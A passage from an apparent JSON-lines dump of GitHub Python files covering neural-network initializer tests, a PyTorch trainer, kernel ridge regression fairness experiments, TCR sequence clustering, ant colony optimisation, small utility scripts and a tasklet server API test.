target_mean=0., target_std=1)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_truncated_normal(tensor_shape):\n _runner(initializers.TruncatedNormal(mean=0, stddev=1), tensor_shape,\n target_mean=0., target_std=None, target_max=2)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_constant(tensor_shape):\n _runner(initializers.Constant(2), tensor_shape,\n target_mean=2, target_max=2, target_min=2)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_lecun_uniform(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(3. / fan_in)\n _runner(initializers.lecun_uniform(), tensor_shape,\n target_mean=0., target_max=scale, target_min=-scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_glorot_uniform(tensor_shape):\n fan_in, fan_out = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(6. / (fan_in + fan_out))\n _runner(initializers.glorot_uniform(), tensor_shape,\n target_mean=0., target_max=scale, target_min=-scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_he_uniform(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(6. / fan_in)\n _runner(initializers.he_uniform(), tensor_shape,\n target_mean=0., target_max=scale, target_min=-scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_glorot_normal(tensor_shape):\n fan_in, fan_out = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(2. / (fan_in + fan_out))\n _runner(initializers.glorot_normal(), tensor_shape,\n target_mean=0., target_std=None, target_max=2 * scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_he_normal(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(2. / fan_in)\n _runner(initializers.he_normal(), tensor_shape,\n target_mean=0., target_std=None, target_max=2 * scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_lecun_normal(tensor_shape):\n fan_in, _ = initializers._compute_fans(tensor_shape)\n scale = np.sqrt(1. / fan_in)\n _runner(initializers.lecun_normal(), tensor_shape,\n target_mean=0., target_std=scale)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_orthogonal(tensor_shape):\n _runner(initializers.orthogonal(), tensor_shape,\n target_mean=0.)\n\n\n@pytest.mark.parametrize('tensor_shape', [(100, 100), (1, 2, 3, 4)], ids=['FC', 'CONV'])\ndef test_identity(tensor_shape):\n if len(tensor_shape) > 2:\n with pytest.raises(ValueError):\n _runner(initializers.identity(), tensor_shape,\n target_mean=1. / tensor_shape[0], target_max=1.)\n else:\n _runner(initializers.identity(), tensor_shape,\n target_mean=1. / tensor_shape[0], target_max=1.)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_zero(tensor_shape):\n _runner(initializers.zeros(), tensor_shape,\n target_mean=0., target_max=0.)\n\n\n@pytest.mark.parametrize('tensor_shape', [FC_SHAPE, CONV_SHAPE], ids=['FC', 'CONV'])\ndef test_one(tensor_shape):\n _runner(initializers.ones(), tensor_shape,\n target_mean=1., target_max=1.)\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","repo_name":"xmengli/H-DenseUNet","sub_path":"Keras-2.0.8/tests/keras/initializers_test.py","file_name":"initializers_test.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":509,"dataset":"github-code","pt":"3"} +{"seq_id":"10057574320","text":"def fight(knights, game_map, t):\n cooldown = 3 # 3 seconds\n combats = {}\n dead = []\n king_key = {'red': None, 'blue': None}\n for k in knights:\n igrid = k.x // game_map.ng\n jgrid = k.y // game_map.ng\n key = f'{igrid},{jgrid}'\n if key not in combats:\n combats[key] = {k.team: [k]}\n elif k.team not in combats[key]:\n combats[key][k.team] = [k]\n else:\n combats[key][k.team].append(k)\n if k.kind == 'king':\n king_key[k.team] = key\n for key in combats:\n if set(combats[key]) == {'blue', 'red'}:\n if key == king_key['blue']:\n blue_attack = max(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['blue']])\n else:\n blue_attack = sum(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['blue']])\n if key == king_key['red']:\n red_attack = max(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['red']])\n else:\n red_attack = sum(\n [k.attack if k.cooldown == 0 else 0 for k in combats[key]['red']])\n for k in combats[key]['blue']:\n k.health = max(0,\n k.health - int(red_attack / len(combats[key]['blue'])))\n if k.health <= 0:\n dead.append(k)\n if k.cooldown == 0:\n k.cooldown = cooldown\n for k in combats[key]['red']:\n k.health = max(0,\n k.health - int(blue_attack / len(combats[key]['red'])))\n if k.health <= 0:\n dead.append(k)\n if k.cooldown == 0:\n k.cooldown = cooldown\n return dead\n","repo_name":"nvaytet/quest","sub_path":"src/quest/core/fight.py","file_name":"fight.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30137074010","text":"# train.py\n\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport plugins\nimport math\n\n\nclass Trainer():\n def __init__(self, args, model, criterion):\n\n self.args = args\n self.model = model\n self.criterion = criterion\n\n self.port = args.port\n self.dir_save = args.save\n\n self.cuda = args.cuda\n self.nepochs = args.nepochs\n self.nclasses = args.nclasses\n self.nchannels = args.nchannels\n self.batch_size = args.batch_size\n self.resolution_high = args.resolution_high\n self.resolution_wide = args.resolution_wide\n\n self.lr = args.learning_rate\n self.momentum = args.momentum\n self.adam_beta1 = args.adam_beta1\n self.adam_beta2 = args.adam_beta2\n self.weight_decay = args.weight_decay\n self.optim_method = args.optim_method\n\n # Felix added\n self.dataset_train_name = args.dataset_train\n\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n if self.optim_method == 'Adam':\n self.optimizer = optim.Adam(parameters, lr=self.lr, betas=(self.adam_beta1, self.adam_beta2), weight_decay=self.weight_decay)\n elif self.optim_method == 'RMSprop':\n self.optimizer = optim.RMSprop(parameters, lr=self.lr, momentum=self.momentum, weight_decay=self.weight_decay)\n elif self.optim_method == 'SGD':\n self.optimizer = optim.SGD(parameters, lr=self.lr, momentum=self.momentum, weight_decay=self.weight_decay, nesterov=True)\n else:\n raise(Exception(\"Unknown Optimization Method\"))\n\n # for classification\n self.label = torch.zeros(self.batch_size).long()\n self.input = torch.zeros(self.batch_size,self.nchannels,self.resolution_high,self.resolution_wide)\n\n if args.cuda:\n self.label = self.label.cuda()\n self.input = self.input.cuda()\n\n self.input = Variable(self.input)\n self.label = Variable(self.label)\n\n # logging training \n self.log_loss_train = plugins.Logger(args.logs, 'TrainLogger.txt')\n self.params_loss_train = ['Loss','Accuracy']\n self.log_loss_train.register(self.params_loss_train)\n\n # logging testing \n self.log_loss_test = plugins.Logger(args.logs, 'TestLogger.txt')\n self.params_loss_test = ['Loss','Accuracy']\n self.log_loss_test.register(self.params_loss_test)\n\n # monitor training\n self.monitor_train = plugins.Monitor()\n self.params_monitor_train = ['Loss','Accuracy']\n self.monitor_train.register(self.params_monitor_train)\n\n # monitor testing\n self.monitor_test = plugins.Monitor()\n self.params_monitor_test = ['Loss','Accuracy']\n self.monitor_test.register(self.params_monitor_test)\n\n # visualize training\n self.visualizer_train = plugins.Visualizer(self.port, 'Train')\n self.params_visualizer_train = {\n 'Loss':{'dtype':'scalar','vtype':'plot'},\n 'Accuracy':{'dtype':'scalar','vtype':'plot'},\n }\n self.visualizer_train.register(self.params_visualizer_train)\n\n # visualize testing\n self.visualizer_test = plugins.Visualizer(self.port, 'Test')\n self.params_visualizer_test = {\n 'Loss':{'dtype':'scalar','vtype':'plot'},\n 'Accuracy':{'dtype':'scalar','vtype':'plot'},\n }\n self.visualizer_test.register(self.params_visualizer_test)\n\n # display training progress\n self.print_train = '[%d/%d][%d/%d] '\n for item in self.params_loss_train:\n self.print_train = self.print_train + item + \" %.4f \"\n\n # display testing progress\n self.print_test = '[%d/%d][%d/%d] '\n for item in self.params_loss_test:\n self.print_test = self.print_test + item + \" %.4f \"\n\n self.evalmodules = []\n \n self.giterations = 0\n self.losses_test = {}\n self.losses_train = {}\n # print(self.model)\n\n def learning_rate(self, epoch):\n # training schedule\n # for CIFAR10\n ## return self.lr * ((0.1 ** int(epoch >= 60)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n # Felix added\n if self.dataset_train_name == 'CIFAR10':\n return self.lr * ((0.1 ** int(epoch >= 60)) * (0.1 ** int(epoch >= 90))* (0.1 ** int(epoch >= 120)))\n elif self.dataset_train_name == 'CIFAR100':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'MNIST':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'FRGC':\n return self.lr * ((0.1 ** int(epoch >= 80)) * (0.1 ** int(epoch >= 120))* (0.1 ** int(epoch >= 160)))\n elif self.dataset_train_name == 'ImageNet':\n decay = math.floor((epoch - 1) / 30)\n return self.lr * math.pow(0.1, decay)\n\n # return self.lr\n\n def get_optimizer(self, epoch, optimizer):\n lr = self.learning_rate(epoch)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return optimizer\n\n # not sure if this is working as it should\n def model_eval(self):\n self.model.eval()\n for m in self.model.modules():\n for i in range(len(self.evalmodules)):\n if isinstance(m, self.evalmodules[i]):\n m.train()\n\n def model_train(self):\n self.model.train()\n\n def train(self, epoch, dataloader):\n self.monitor_train.reset()\n data_iter = iter(dataloader)\n\n self.input.volatile = False\n self.label.volatile = False\n\n self.optimizer = self.get_optimizer(epoch+1, self.optimizer)\n\n # switch to train mode\n self.model_train()\n\n i = 0\n while i < len(dataloader):\n\n ############################\n # Update network\n ############################\n\n input,label = data_iter.next()\n i += 1\n\n batch_size = input.size(0)\n if batch_size == self.batch_size:\n self.input.data.resize_(input.size()).copy_(input)\n self.label.data.resize_(label.size()).copy_(label)\n\n output = self.model(self.input)\n loss = self.criterion(output,self.label)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # this is for classfication\n pred = output.data.max(1)[1]\n\n acc = float(pred.eq(self.label.data).cpu().sum()*100.0) / float(batch_size)\n self.losses_train['Accuracy'] = float(acc)\n self.losses_train['Loss'] = float(loss.data[0])\n self.monitor_train.update(self.losses_train, batch_size)\n print(self.print_train % tuple([epoch, self.nepochs, i, len(dataloader)] + [self.losses_train[key] for key in self.params_monitor_train]))\n\n loss = self.monitor_train.getvalues()\n self.log_loss_train.update(loss)\n self.visualizer_train.update(loss)\n return self.monitor_train.getvalues('Accuracy')\n\n def test(self, epoch, dataloader):\n self.monitor_test.reset()\n data_iter = iter(dataloader)\n\n self.input.volatile = True\n self.label.volatile = True\n\n # switch to eval mode\n self.model_eval()\n\n i = 0\n while i < len(dataloader):\n\n ############################\n # Evaluate Network\n ############################\n\n input,label = data_iter.next()\n i += 1\n\n batch_size = input.size(0)\n if batch_size == self.batch_size:\n self.input.data.resize_(input.size()).copy_(input)\n self.label.data.resize_(label.size()).copy_(label)\n\n self.model.zero_grad()\n output = self.model(self.input)\n loss = self.criterion(output,self.label)\n\n # this is for classification\n pred = output.data.max(1)[1]\n acc = float(pred.eq(self.label.data).cpu().sum()*100.0) / float(batch_size)\n self.losses_test['Accuracy'] = float(acc)\n self.losses_test['Loss'] = float(loss.data[0])\n self.monitor_test.update(self.losses_test, batch_size)\n print(self.print_test % tuple([epoch, self.nepochs, i, len(dataloader)] + [self.losses_test[key] for key in self.params_monitor_test]))\n\n loss = self.monitor_test.getvalues()\n self.log_loss_test.update(loss)\n self.visualizer_test.update(loss)\n return self.monitor_test.getvalues('Accuracy')\n","repo_name":"juefeix/pnn.pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"3"} +{"seq_id":"32884392536","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport multiprocess as mp\r\nimport itertools\r\nimport pickle\r\nimport time\r\n# import gpflow\r\n# import tensorflow as tf\r\nimport GPy\r\n# from IPython.display import display\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn import preprocessing\r\nfrom tqdm import tqdm\r\n\r\nimport perform_kernel_regression_fair_learing\r\nfrom perform_kernel_regression_fair_learing import FairLearning\r\nfrom perform_kernel_regression_fair_learing import fl_wrapper\r\nfrom perform_kernel_regression_fair_learing import FairLearning_process\r\nfrom perform_kernel_regression_fair_learing import centre_mat\r\nfrom perform_kernel_regression_fair_learing import cross_v\r\n\r\nfrom hyppo.independence import Hsic\r\n\r\n# for median_heuristic\r\nfrom numpy.random import permutation\r\nfrom scipy.spatial.distance import squareform, pdist, cdist\r\n\r\nimport time\r\n\r\n# %%\r\nX = pd.read_csv('X.csv')\r\ny = pd.read_csv('y.csv')\r\n\r\nX = X.values.reshape(X.shape)[:, 1:]\r\ny = y.values.reshape(y.shape)[:, 1:]\r\n# %%\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\r\n\r\n#%%\r\ndef save_csv(array_name, filename):\r\n pd.DataFrame(array_name).to_csv(filename + '.csv')\r\n\r\nsave_csv(x_train, 'x_train')\r\nsave_csv(x_test, 'x_test')\r\nsave_csv(y_train, 'y_train')\r\nsave_csv(y_test, 'y_test')\r\n\r\n#%%\r\nx_train = pd.read_csv('x_train.csv').values[:, 1:]\r\nx_test = pd.read_csv('x_test.csv').values[:, 1:]\r\ny_train = pd.read_csv('y_train.csv').values[:, 1:]\r\ny_test = pd.read_csv('y_test.csv').values[:, 1:]\r\n#%%\r\ns_train = x_train[:, 0].reshape(x_train.shape[0], 1)\r\ns_test = x_test[:, 0].reshape(x_test.shape[0], 1)\r\n# %%\r\n# TODO Set parameters for grid search\r\n# cross validation searching grid\r\ndef get_sigma_median_heuristic(X):\r\n n = X.shape[0]\r\n if n > 1000:\r\n X = X[permutation(n)[:1000], :]\r\n dists = squareform(pdist(X, 'euclidean'))\r\n median_dist = np.median(dists[dists > 0])\r\n sigma = median_dist / np.sqrt(2.)\r\n return sigma\r\n\r\n\r\nmedian_dis = get_sigma_median_heuristic(x_train)\r\ngenerated_sc_x_array = np.random.uniform(np.exp(-15), 1, 10)\r\nheuristic_sc_x_array = np.random.randn(10, ) + median_dis\r\nheuristic_sc_x_array = heuristic_sc_x_array[heuristic_sc_x_array > 0]\r\nsc_x_array = np.concatenate((generated_sc_x_array, heuristic_sc_x_array, np.array(median_dis).reshape(1, )))\r\n\r\nsc_s_array = np.array([0.5]) # np.random.uniform(0,5,25)\r\n\r\nsc_x_array.sort()\r\n\r\n# remove necessary sc_x(e.g., two sc_x that are two close)\r\ntemp_sc_x_array = list()\r\njump = False\r\nbeacon = sc_x_array[0]\r\ntemp_sc_x_array.append(beacon)\r\nfor i in range(len(sc_x_array)):\r\n if sc_x_array[i] - beacon >= 0.05:\r\n temp_sc_x_array.append(sc_x_array[i])\r\n beacon = sc_x_array[i]\r\n\r\nsc_x_array = np.array(temp_sc_x_array)\r\n\r\nlmda_array = (np.exp(-20 + np.arange(10)))\r\n\r\npar_list = list(itertools.product(sc_x_array, sc_s_array, lmda_array))\r\n#%%\r\ntry:\r\n with open('par_list_FKL', 'rb') as pf:\r\n par_list = pickle.load(pf)\r\nexcept:\r\n pass\r\n\r\n# %%\r\n# define parallel function\r\ndef FairLearning_process(processes, x_train, y_train, x_test, y_test, s_train, s_test, par_list, mu_list, NumFolds):\r\n # pool = mp.Pool(processes=processes)\r\n # pool = Pool(processes=processes)\r\n arg_list1 = [x_train, y_train, x_test, y_test, s_train, s_test, par_list, NumFolds]\r\n arg_list = []\r\n for mu in mu_list:\r\n arg_list2 = arg_list1 + [mu]\r\n arg_list.append(arg_list2)\r\n\r\n # results = pool.map(fl_wrapper, arg_list)\r\n with mp.Pool(processes) as pool:\r\n # results = pool.map(fl_wrapper, arg_list)\r\n results = pool.map(fl_wrapper, arg_list)\r\n return results\r\n\r\n\r\n# %%\r\npar_list_t = list(itertools.product(sc_x_array, sc_s_array, lmda_array))\r\n\r\n# y_pred, error_pred, HSIC = fair_regression(x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test,\r\n# s_train=s_train, s_test=s_test)\r\n\r\npd.DataFrame(par_list_t).to_csv(\"par_list_t.csv\")\r\n# %%\r\nprocesses = 6\r\nNumFolds = 5\r\nmu_list = [0, 0.1, 0.7, 2.0, 5.0, 10.0]\r\n\r\nstime = time.time()\r\npara_result = FairLearning_process(processes=processes, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test,\r\n s_train=s_train, s_test=s_test, par_list=par_list, mu_list=mu_list,\r\n NumFolds=NumFolds)\r\n\r\nprint(\"Time for FKRR CV search job: %.3f\" % (time.time() - stime))\r\ntime = time.time() - stime\r\n\r\ndata = [x_train, y_train, x_test, y_test]\r\nall = [data, para_result]\r\n\r\n# %%\r\npickle_out1 = open(\"krr_result_gpy3\", \"wb\")\r\npickle.dump(all, pickle_out1)\r\npickle_out1.close()\r\n\r\n# %%\r\nimport pickle\r\n\r\nwith open('test', 'rb') as f:\r\n all = pickle.load(f)\r\n\r\n'''\r\ndata: all[0][0:4] data = [x_train, y_train, x_test, y_test]\r\n\r\npara_result: all[1][0:6] para_result = results = pool.map(fl_wrapper, arg_list)\r\nfl_wrapper = results_list = [mu, y_pred, rmse, hsic, lmda, sc_x]\r\n\r\nmu: all[1][n][0]\r\ny_pred: all[1][n][1]\r\nrmse: all[1][n][2]\r\nhsic: all[1][n][3]\r\nlmda: all[1][n][4]\r\nsc_x: all[1][n][5]\r\n'''\r\n","repo_name":"BingliangLi/HSIC-regularized-Kernel-Ridge-Regression","sub_path":"fair_KRR.py","file_name":"fair_KRR.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"1528646868","text":"# By Neerja Thakkar for \"Balancing sensitivity and specificity in\n# distinguishing TCR groups by CDR sequence similarity\"\n# See README for license information\n\nfrom parse_sequences import txttoseqlist\nfrom cluster_CDRs import cluster_data\nfrom cluster_distance_scores import score_repertoire_twins, create_motif\nimport sys\n\n\ndef cluster_and_get_distance_scores(subject_file, subject_twin_file, other_files, clustering_distance, output_dir):\n log_file = open(output_dir + \"output.txt\", mode = 'w')\n log_file.write(subject_file[11:])\n\n Xlabels = txttoseqlist(subject_file, trim_first=True, remove_special=True)\n Xlabelstwin = txttoseqlist(subject_twin_file, trim_first=True, remove_special=True)\n\n print(\"clustering subject and their twin...\")\n\n clusters = cluster_data(Xlabels, max_distance=clustering_distance)\n clusters_twin = cluster_data(Xlabelstwin, max_distance=clustering_distance)\n\n print(\"clustered subject and their twin\")\n\n # convert clusters to list of clusters\n clusters_list = []\n for key in clusters:\n clusters_list.append(clusters[key])\n\n twin_clusters_list = []\n for key in clusters_twin:\n twin_clusters_list.append(clusters_twin[key])\n\n print(\"clustering other individuals...\")\n\n other_clusterings = []\n # get the other twins reperotires\n for file in other_files:\n Xlabelsother = txttoseqlist(file, trim_first=True, remove_special=True)\n clusters2other = cluster_data(Xlabelsother, max_distance=clustering_distance)\n\n other_clusters = []\n for key in clusters2other:\n other_clusters.append(clusters2other[key])\n\n other_clusterings.append(other_clusters)\n\n print(\"clustered others\")\n print(\"getting scores...\")\n\n # get the scores\n scores = score_repertoire_twins(clusters_list, twin_clusters_list, other_clusterings, min_clust_size=4)\n print(scores)\n\n n = 1\n\n for score_data in scores:\n log_file.write(\"\\n\\ncluster #\" + str(n))\n # print(score_data)\n # print(\"parsing data...\\n\")\n\n # parse score data\n cluster = score_data[1]\n twin_cluster = score_data[0][1]\n twin_cluster_score = score_data[0][0]\n log_file.write(\"\\ncluster is :\" + str(cluster))\n log_file.write(\"\\nthe closest twin cluster is \" + str(twin_cluster))\n log_file.write(\"\\ntheir score is: \" + str(twin_cluster_score))\n\n # create motifs\n create_motif(cluster, str(n) + \"_subject\", output_dir)\n create_motif(twin_cluster, str(n) + \"_subject_twin\", output_dir)\n\n # calculate average distance to other clusters\n total_dist = 0\n count = 0\n other_scores = []\n\n for i in range(len(other_files)):\n data = score_data[i+2]\n repertoire = other_files[i][22:]\n other_score = data[0]\n other_cluster = data[2]\n log_file.write(\"\\nscore with \" + str(repertoire) + \" is \" + str(other_score))\n log_file.write(\"\\ncluster: \" + str(other_cluster))\n\n create_motif(other_cluster, str(n) + \"_\" + str(repertoire), output_dir)\n\n total_dist += other_score\n count += 1\n other_scores.append(other_score)\n\n avg_score = total_dist/count\n log_file.write(\"\\naverage score to another cluster is \" + str(avg_score))\n log_file.write(\"\\nthe closest score to another cluster is \" + str(min(other_scores)))\n\n log_file.write(' ')\n\n n += 1\n\n\n\n# inputs (from command line): list of cluster files, directory, title\nif len(sys.argv) < 5:\n print(\"need the following arguments: output directory, threshold to cluster to, subject to analyze, their twin, all repertoire files\")\n print(\"twin to analyze: TwA1, TwA2, TwC1, TwC2, TwD1, TwD2\")\n sys.exit()\n\noutput_directory = sys.argv[1]\ndistance = float(sys.argv[2])\nsubject = sys.argv[3]\ntwin = sys.argv[4]\nall_files = sys.argv[5].split(',')\n\nfilename = \"\"\ntwin_file = \"\"\nfor file in all_files:\n if subject in file:\n filename = file\n if twin in file:\n twin_file = file\n\nother_files = []\nfor file in all_files:\n if subject not in file and twin not in file:\n other_files.append(file)\n\ncluster_and_get_distance_scores(filename, twin_file, other_files, distance, output_directory)\n","repo_name":"neerjathakkar/Distinguishing-TCR-Groups","sub_path":"twins_distance_scores.py","file_name":"twins_distance_scores.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"21677131700","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.random.seed(6)\nnum_points = 8\n\npoints = range(num_points)\npoints_coordinate = np.random.rand(num_points, 2)\ndistance_matrix = np.zeros(shape=(num_points, num_points))\nfor i in range(num_points):\n for j in range(num_points):\n distance_matrix[i][j] = np.linalg.norm(points_coordinate[i] - points_coordinate[j], ord=2)\nprint('distance_matrix is: \\n', distance_matrix)\n\n\ndef demo_func(points):\n num_points, = points.shape\n total_distance = 0\n for i in range(num_points - 1):\n total_distance += distance_matrix[points[i], points[i + 1]]\n total_distance += distance_matrix[points[i + 1], points[0]]\n return total_distance\n\n\n# %%\nimport numpy as np\n\nfunc = len(points)\nn = 8 # 城市数量\nm = 20 # 蚂蚁数量\nalpha = 1 # 信息素重要程度\nbeta = 1 # 适应度的重要程度\nrho = 0.1 # 信息素挥发速度\n\niter_max = 800\nTau = np.ones((n, n)) # 信息素矩阵\nTable = np.zeros((m, n)).astype(np.int) # 一代每个蚂蚁的实际路径\n\n# x_g_best, y_best = [], [] # 记录各代的最佳情况\nx_best_history, y_best_history = [], []\n\n# %%\nfor i in range(n):\n distance_matrix[i, i] = 1e-10 # 避免除零错误\n\nfor i in range(iter_max): # 对每次迭代\n prob_matrix = (Tau ** alpha) * (1 / distance_matrix) ** beta # 转移概率,无须归一化。\n for j in range(m): # 对每个蚂蚁\n Table[j, 0] = 0 # start point,其实可以随机,但没什么区别\n for k in range(n - 1): # 蚂蚁到达的每个节点\n taboo_set = set(Table[j, :k + 1]) # 已经经过的点和当前点,不能再次经过\n allow_list = list(set(points) - taboo_set) # 在这些点中做选择\n prob = prob_matrix[Table[j, k], allow_list]\n prob = prob / prob.sum()\n next_point = np.random.choice(allow_list, size=1, p=prob)[0]\n Table[j, k + 1] = next_point\n\n # 计算距离\n y = np.array([demo_func(i) for i in Table])\n\n # 顺便记录历史最好情况\n index_best = y.argmin()\n x_best, y_best = Table[index_best, :], y[index_best]\n x_best_history.append(x_best)\n y_best_history.append(y_best)\n\n # 计算需要新涂抹的信息素\n delta_tau = np.zeros((n, n))\n for j in range(m): # 每个蚂蚁\n for k in range(n - 1): # 每个节点\n n1, n2 = Table[j, k], Table[j, k + 1]\n delta_tau[n1, n2] += 1 / y[j]\n n1, n2 = Table[j, n - 1], Table[j, 0]\n delta_tau[n1, n2] += 1 / y[j]\n\n # 信息素飘散+信息素涂抹\n Tau = (1 - rho) * Tau + delta_tau\n\nTau\n# %%\ny_best_history = np.array(y_best_history)\na = y_best_history.argmin()\nbest_points = x_best_history[a]\n\n# %%\nfig, ax = plt.subplots(1, 1)\nplt.plot(pd.DataFrame(y_best_history).cummin(axis=0))\n\nfig, ax = plt.subplots(1, 1)\nbest_points_ = np.concatenate([best_points, [best_points[0]]])\nbest_points_coordinate = points_coordinate[best_points_, :]\nax.plot(best_points_coordinate[:, 0], best_points_coordinate[:, 1], 'o-r')\nplt.show()\n","repo_name":"scarecrowyu/scikit-opt","sub_path":"ACA.py","file_name":"ACA.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11212781367","text":"def contar_vocales(frase):\n conteo_vocales = {'a': 0, 'e': 0, 'i': 0, 'o': 0, 'u': 0}\n frase = frase.lower()\n for char in frase:\n if char in conteo_vocales:\n conteo_vocales[char] += 1\n return conteo_vocales\n\nfrase = input(\"Introduce una frase: \")\nconteo = contar_vocales(frase)\n\nprint(\"Conteo de vocales en la frase:\")\nfor vocal, conteo_vocal in conteo.items():\n print(f\"{vocal}: {conteo_vocal}\")","repo_name":"MarioDev98/CuentaVocales-Python","sub_path":"VocalesPython.py","file_name":"VocalesPython.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22568713283","text":"import math\r\n\r\n\r\ndef intersection(function, x0, x1):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n function : function\r\n function is the function we want to find its root\r\n x0, x1 : numbers\r\n The interval in which to search for a solution\r\n \r\n Return\r\n ------\r\n x_n2 : number\r\n \"\"\"\r\n x_n = x0\r\n x_n1 = x1\r\n while True:\r\n x_n2 = x_n1 - (\r\n function(x_n1) / ((function(x_n1) - function(x_n)) / (x_n1 - x_n))\r\n )\r\n if abs(x_n2 - x_n1) < 10 ** -5:\r\n return x_n2\r\n x_n = x_n1\r\n x_n1 = x_n2\r\n\r\ndef f(x):\r\n return math.pow(x, 3) - 2*x - 5\r\n\r\nif __name__ == \"__main__\":\r\n print(intersection(f, 3, 3.5))","repo_name":"acekun141/Python","sub_path":"arithmetic_analysis/intersection.py","file_name":"intersection.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29034523717","text":"import base64\nimport copy\nimport http.client\nimport json\nimport typing\n\nimport requests\nimport uuid\nfrom google.protobuf import json_format\nfrom google.protobuf import message as proto_message\n\nfrom tasklet.experimental.examples.proto import fake_ya_make_pb2\n\nfrom tasklet.experimental.tests.common import models as test_models\nfrom tasklet.experimental.tests.common import server_mock\nfrom tasklet.experimental.tests.common import utils as test_utils\n\nfrom tasklet.api.v2 import well_known_structures_pb2\nfrom tasklet.api.v2 import tasklet_service_pb2\nfrom tasklet.api.v2 import data_model_pb2\n\n\ndef _format_execution_json(data: dict) -> dict:\n data2 = copy.deepcopy(data)\n data2.setdefault(\"status\", {}).setdefault(\"result\", {})\n buf = data_model_pb2.Execution()\n json_format.ParseDict(data2, buf)\n return json_format.MessageToDict(buf, including_default_value_fields=True)\n\n\ndef _execution_to_json(msg: data_model_pb2.Execution) -> dict:\n return _format_execution_json(json_format.MessageToDict(msg))\n\n\ndef _run_execution(\n tasklet_server: server_mock.TaskletServer,\n tasklet: test_models.Tasklet,\n build: test_models.Build,\n label: test_models.Label,\n message_obj: proto_message.Message,\n) -> dict:\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(message_obj.SerializeToString()).decode()\n }\n }\n )\n\n test_utils.ensure_response_status(rv)\n execution_json = rv.json()[\"execution\"]\n assert execution_json[\"meta\"][\"build_id\"] == build.ID\n assert execution_json[\"meta\"][\"tasklet_id\"] == tasklet.ID\n assert execution_json[\"status\"][\"status\"] == \"E_EXECUTION_STATUS_EXECUTING\"\n return execution_json\n\n\ndef test_executions(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_json = 